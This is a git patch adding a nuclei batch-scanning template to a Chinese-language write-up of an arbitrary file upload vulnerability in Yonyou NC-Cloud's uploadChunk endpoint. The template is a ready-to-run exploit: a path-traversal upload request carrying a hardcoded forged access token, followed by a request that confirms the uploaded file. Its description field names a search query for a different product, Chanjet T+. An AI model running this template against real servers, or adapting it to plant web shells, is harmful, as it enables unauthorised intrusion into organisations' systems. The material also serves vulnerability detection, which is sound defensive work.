From 57db70681e492493302f65fd9a2ae599bafeea45 Mon Sep 17 00:00:00 2001
From: wy876 <139549762+wy876@users.noreply.github.com>
Date: Fri, 24 Nov 2023 19:50:34 +0800
Subject: [PATCH] =?UTF-8?q?Update=20=E7=94=A8=E5=8F=8BNC-Cloud=20uploadChu?=
 =?UTF-8?q?nk=20=E4=BB=BB=E6=84=8F=E6=96=87=E4=BB=B6=E4=B8=8A=E4=BC=A0?=
 =?UTF-8?q?=E6=BC=8F=E6=B4=9E.md?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 用友NC-Cloud uploadChunk 任意文件上传漏洞.md | 42 ++++++++++++++++++++
 1 file changed, 42 insertions(+)

diff --git a/用友NC-Cloud uploadChunk 任意文件上传漏洞.md b/用友NC-Cloud uploadChunk 任意文件上传漏洞.md
index 56810aa..06894dc 100644
--- a/用友NC-Cloud uploadChunk 任意文件上传漏洞.md	
+++ b/用友NC-Cloud uploadChunk 任意文件上传漏洞.md	
@@ -23,3 +23,45 @@ Content-Disposition: form-data; name="file"; filename="test.txt"
 
 文件上传路径访问
 /nccloud/test.txt
+
+## nuclei批量yaml文件
+```yaml
+id: yonyou_NCCloud_uploadChunk_upload
+
+info:
+  name: 用友NC Cloud uploadChunk任意文件上传漏洞
+  author: afan
+  severity: critical
+  tags: yonyou,changjietong,bjxsec,yonyouoa
+  description: fofa   app="畅捷通-TPlus"
+variables:
+  file_name: "{{to_lower(rand_text_alpha(8))}}.txt"
+  file_content: "{{to_lower(rand_text_alpha(26))}}"
+requests:
+  - raw:
+      - |
+        POST /ncchr/pm/fb/attachment/uploadChunk?fileGuid=/../../../nccloud/&chunk=1&chunks=1 HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: multipart/form-data; boundary=024ff46f71634a1c9bf8ec5820c26fa9
+        accessTokenNcc: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyaWQiOiIxIn0.F5qVK-ZZEgu3WjlzIANk2JXwF49K5cBruYMnIOxItOQ
+        Content-Length: 153
+
+        --024ff46f71634a1c9bf8ec5820c26fa9
+        Content-Disposition: form-data; name="file"; filename="{{file_name}}"
+
+        {{file_content}}
+        --024ff46f71634a1c9bf8ec5820c26fa9--
+      
+      - |
+        GET /nccloud/{{file_name}} HTTP/1.1
+        Host: {{Hostname}}
+
+    req-condition: true
+    matchers:
+      - type: word
+        words:
+          - "{{file_content}}"
+        part: body
+
+
+```